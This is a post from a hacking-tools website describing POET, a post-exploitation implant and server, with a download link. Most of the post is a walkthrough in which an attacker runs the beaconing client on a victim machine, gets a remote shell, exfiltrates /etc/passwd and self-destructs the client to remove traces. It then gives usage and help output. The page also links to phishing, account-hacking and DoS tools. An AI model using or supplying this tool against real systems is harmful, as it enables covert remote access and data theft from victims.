• Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Menu
  • Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Search
Close
  • Home
  • 2018
  • January
  • 28
  • POET – A Simple Post-Exploitation Tool

POET – A Simple Post-Exploitation Tool

January 28, 2018 Comments Off on POET – A Simple Post-Exploitation Tool
download poet how to use poet POET - A Simple Post-Exploitation Tool poet commands poet hacking tool poet tutorial post exploitation tools

POET is a simple post-exploitation tool to gain a remote shell on target machine.

The client program runs on the target machine and is configured with an IP address (the server) to connect to and a frequency to connect at. If the server isn’t running when the client tries to connect, the client quietly sleeps and tries again at the next interval. If the server is running however, the attacker gets a control shell to control the client and perform various actions on the target including:
  • reconnaissance
  • remote shell
  • file exfiltration
  • download and execute
  • self-destruct


Example:

The scenario is, an attacker has gotten access to the victim’s machine and downloaded and executed the client. She does not have the server running at this point, but it’s ok, the client waits patiently. Eventually, the attacker is ready and starts the server, first starting a shell and executing uname -a, then exfiltrating /etc/passwd. Then she exits and detaches from the client, which continues running on the target waiting for the next opportunity to connect to the server. Later, she connects again, self-destructing the client, removing all traces from the target.

Victim’s Machine (5.4.3.2):

$ ./poet-client 1.2.3.4 10  # poet-client daemonizes, so there's nothing to see

Warning: After running this command, you’ll need to either run selfdestruct from the server, or kill the poet-client process to stop the client.

Attacker’s Machine (1.2.3.4):

$ sudo ./poet-server

                          _
        ____  ____  ___  / /_
       / __ \/ __ \/ _ \/ __/
      / /_/ / /_/ /  __/ /
     / .___/\____/\___/\__/
    /_/

[+] (06/28/15 03:58:42) Dropping privileges to uid: 501, gid: 20
[+] (06/28/15 03:58:42) Poet server started (port 443)
[+] (06/28/15 03:58:50) Connected By: ('127.0.0.1', 54494) -> VALID
[+] (06/28/15 03:58:50) Entering control shell
Welcome to posh, the Poet Shell!
Running `help' will give you a list of supported commands.
posh > help
Commands:
  chint
  dlexec
  exec
  exfil
  exit
  help
  recon
  selfdestruct
  shell
posh > shell
posh > [email protected] $ uname -a
Linux lolServer 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed May 07 16:19:23 UTC 2014 
x86_64 x86_64 x86_64 GNU/Linux
posh > [email protected] $ ^D
posh > exfil /etc/passwd
posh : exfil written to archive/20150628/exfil/passwd-201506285917.txt
posh > ^D
[+] (06/28/15 03:59:18) Exiting control shell
[-] (06/28/15 03:59:18) Poet server terminated
$ sudo ./poet-server

                          _
        ____  ____  ___  / /_
       / __ \/ __ \/ _ \/ __/
      / /_/ / /_/ /  __/ /
     / .___/\____/\___/\__/
    /_/

[+] (06/28/15 03:59:26) Dropping privileges to uid: 501, gid: 20
[+] (06/28/15 03:59:26) Poet server started (port 443)
[+] (06/28/15 03:59:28) Connected By: ('127.0.0.1', 54542) -> VALID
[+] (06/28/15 03:59:28) Entering control shell
Welcome to posh, the Poet Shell!
Running `help' will give you a list of supported commands.
posh > selfdestruct
[!] WARNING: You are about to permanently remove the client from the target.
    You will immediately lose access to the target. Continue? (y/n) y
[+] (06/28/15 03:59:33) Exiting control shell
[-] (06/28/15 03:59:33) Poet server terminated

Usage:

Poet is super easy to use, and requires nothing more than the Python (2.7) standard library. To easily test it out, a typical invocation would look like:

Terminal 1:

$ ./poet-client 127.0.0.1 1 --debug --no-selfdestruct

By default, the Poet client daemonizes and deletes itself from disk, so that behavior is suppressed using the –debug and –no-selfdestruct flags.

Terminal 2:

$ sudo ./poet-server

By default, the server needs to be run as root (using sudo) because the default port it binds to is 443. If that makes you uncomfortable, simply omit sudo and use the -p <PORT> flag on both the client and server. Pick a nice, high number for your port (> 1024).

Client:

$ ./poet-client -h
usage: poet-client [-h] [-p PORT] [--debug] [--no-daemon] [--no-selfdestruct]
                   IP [INTERVAL]

positional arguments:
  IP                    Poet Server
  INTERVAL              Beacon Interval, in seconds. Default: 600

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT
  --debug               show debug messages. implies --no-daemon
  --no-daemon           don't daemonize
  --no-selfdestruct     don't selfdestruct

Poet is a client/server application. The client is executed on the target and beacons back to the server at a certain time interval. The only required argument is the IP address where the server is or will be running. Following it can optionally be the time interval in seconds of how frequently to beacon back, which defaults to 10 minutes. The port for the client to beacon out on can be specified with the -p flag. All other flags would not be used during “real” usage and exist mainly for debugging.

Server:

$ ./poet-server -h
usage: poet-server [-h] [-p PORT] [-v]

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT
  -v, --version         prints the Poet version number and exits

Download poet

Post navigation

Snorter – Simple Snort Installation
Naked Citizens Documentary

Related Articles

Faction – C2 Framework

- Post Exploitation
October 22, 2019

PoshC2 – Powershell C2 Server and Implants

- Post Exploitation
August 9, 2019

Koadic – C3 COM Command & Control – JScript RAT

- Backdoors, Payloads, Post Exploitation
July 24, 2019July 23, 2019
hacker gadgets
hacker phone covers

Recent Posts

mx-takeover: detects misconfigured MX records

mx-takeover: detects misconfigured MX records

July 7, 2022
Two Charged for Selling Counterfeit Oxycodone Pills

Two Charged for Selling Counterfeit Oxycodone Pills

July 7, 2022
pywhisker: Python tool for Shadow Credentials attacks

pywhisker: Python tool for Shadow Credentials attacks

July 7, 2022
CrackQL - GraphQL Password Brute-Force And Fuzzing Utility

CrackQL – GraphQL Password Brute-Force And Fuzzing Utility

July 7, 2022
CVE-2022-2274: OpenSSL Remote Code Execution Vulnerability

CVE-2022-2274: OpenSSL Remote Code Execution Vulnerability

July 6, 2022
Fraudulent Credit Card Maker Sentenced to 108 Months in Prison

Fraudulent Credit Card Maker Sentenced to 108 Months in Prison

July 6, 2022

Social Media Hacking

SocialPath – Track users across Social Media Platforms

SocialPath – Track users across Social Media Platforms

- Social Media Hacking
October 16, 2019October 16, 2019

SocialPath is a django application for gathering social media intelligence on specific username. It checks for Twitter, Instagram, Facebook, Reddit...

SocialScan – Check Email Address and Username Availability on Online Platforms

SocialScan – Check Email Address and Username Availability on Online Platforms

June 17, 2019
Shellphish – Phishing Tool For 18 Social Media Apps

Shellphish – Phishing Tool For 18 Social Media Apps

June 10, 2019July 27, 2019
WhatsApp Hacking using QRLJacking

WhatsApp Hacking using QRLJacking

May 2, 2019May 19, 2019
How to Hack any Facebook Account with Z-Shadow

How to Hack any Facebook Account with Z-Shadow

April 26, 2019June 29, 2020
hacker buffs
ABOUT US

Haxf4rall is a collective, a good starting point and provides a variety of quality material for cyber security professionals.

Our primary focus revolves around the latest tools released in the Infosec community and provide a platform for developers to showcase their skillset and current projects.

COMPANY
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • LANC Remastered
  • PCPS IP Puller
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Menu
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • LANC Remastered
  • PCPS IP Puller
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Live Chat
RESOURCES
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Menu
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Get Started
TOOLBOX
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Menu
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Tools Directory

2014 – 2020 | Haxf4rall.com               Stay Connected:

Facebook Twitter Google-plus Wordpress
Please wait...

Join Our Community

Subscribe now and get your free HACKERS HANDBOOK

Don't Worry ! You will not be spammed
SIGN UP FOR NEWSLETTER NOW